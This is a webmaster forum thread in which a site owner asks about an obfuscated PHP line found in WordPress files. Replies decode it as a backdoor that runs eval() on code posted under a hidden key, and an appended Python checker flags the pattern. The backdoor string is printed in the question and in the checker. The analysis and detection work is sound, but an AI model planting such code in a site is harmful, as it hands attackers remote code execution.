
what does this code mean


tyutghf

Hi

I found a file in my WordPress website containing this code

Code:
$wat8= "so_pt" ; $cvn1=strtoupper ( $wat8[2].$wat8[3].$wat8[1]. $wat8[0].$wat8[4]) ;if( isset( ${$cvn1 }[ 'qd6e706' ])){eval( ${ $cvn1 } [ 'qd6e706']) ; }

I have removed it and found a few other files with similar code in them and removed those, reset all passwords, and created new salts. All plugins are up to date, as is the WordPress version. What does this code do?
 
This just sets the variable $wat8 to the value of "so_pt".
Code:
$wat8= "so_pt" ;

This simply concatenates each of the characters of $wat8 in a different order and makes them upper case, so $cvn1 ends up having the value of "_POST".
Code:
 $cvn1=strtoupper ( $wat8[2].$wat8[3].$wat8[1]. $wat8[0].$wat8[4]) ;

This then checks whether a variable named $_POST exists and contains a key named 'qd6e706', in which case it evaluates it (i.e. tries to execute any code inside it).
Code:
if( isset( ${$cvn1 }[ 'qd6e706' ])){eval( ${ $cvn1 } [ 'qd6e706']) ; }

All together, it looks to be intercepting a value from a posted form, and attempting to run any code that may be inside it.






----------------------------------
Phil AKA Vacunita
----------------------------------
Ignorance is not necessarily Bliss, case in point:
Unknown has caused an Unknown Error on Unknown and must be shutdown to prevent damage to Unknown.

Web & Tech
 
It means your WordPress installation has been infected with a code injection attack. We have one hosting client that had the same attack a few days ago.

If you have full server access I suggest installing Maldetect which can scan the server for malicious files.

For WordPress, install All in one Wordpress Security and it will alert you of any files that have been changed, added or removed.
It does a lot more as well of course but we get file system alerts for all our clients with WP installs and can deal with the problem normally before any damage is done.

Chris.

Indifference will be the downfall of mankind, but who cares?
Time flies like an arrow, however, fruit flies like a banana.
Webmaster Forum
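
An added example, not part of either reply above: a small Python checker that statically repeats the three steps walked through earlier in the thread (literal assignment, index-by-index concatenation, eval of a variable variable) and flags a file when the rebuilt name is a PHP superglobal. The function names and the regular expressions are this example's own assumptions, not the logic of Maldetect or of any WordPress plugin.

```python
import re

# The snippet from the question, embedded as sample input (never executed).
SAMPLE = r'''$wat8= "so_pt" ; $cvn1=strtoupper ( $wat8[2].$wat8[3].$wat8[1]. $wat8[0].$wat8[4]) ;if( isset( ${$cvn1 }[ 'qd6e706' ])){eval( ${ $cvn1 } [ 'qd6e706']) ; }'''

SUPERGLOBALS = {"_POST", "_GET", "_REQUEST", "_COOKIE", "_SERVER", "_FILES"}

# $name = "literal" ;
ASSIGN = re.compile(r'\$(\w+)\s*=\s*(["\'])([^"\']*)\2\s*;')
# $name = strtoupper( $src[2].$src[3]. ... ) ;   (case wrapper optional)
BUILD = re.compile(r'\$(\w+)\s*=\s*(strtoupper|strtolower)?\s*\(?\s*'
                   r'((?:\$\w+\s*\[\s*\d+\s*\]\s*\.?\s*)+)\)?\s*;')
INDEX = re.compile(r'\$(\w+)\s*\[\s*(\d+)\s*\]')
# eval( ${ $name } [ 'key' ...
EVAL_VARVAR = re.compile(r'\beval\s*\(\s*\$\{\s*\$(\w+)\s*\}\s*\[\s*(["\'])(\w+)\2')

def resolve_strings(php):
    """Map variable -> value for literals and for strings rebuilt from them."""
    values = {m.group(1): m.group(3) for m in ASSIGN.finditer(php)}
    for m in BUILD.finditer(php):
        target, func, expr = m.groups()
        try:
            built = "".join(values[v][int(i)] for v, i in INDEX.findall(expr))
        except (KeyError, IndexError):
            continue  # source string unknown or index out of range
        if func == "strtoupper":
            built = built.upper()
        elif func == "strtolower":
            built = built.lower()
        values[target] = built
    return values

def find_eval_backdoors(php):
    """Return (superglobal, key) pairs where eval() reads request data
    through a variable variable whose name was rebuilt from a literal."""
    values = resolve_strings(php)
    return [(values[m.group(1)], m.group(3))
            for m in EVAL_VARVAR.finditer(php)
            if values.get(m.group(1)) in SUPERGLOBALS]

if __name__ == "__main__":
    for name, key in find_eval_backdoors(SAMPLE):
        print(f"eval() of ${name}['{key}'] reached via a rebuilt variable name")
```

The patterns only cover the obfuscation style shown in this thread, so a file that produces no finding has not been shown to be clean.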
 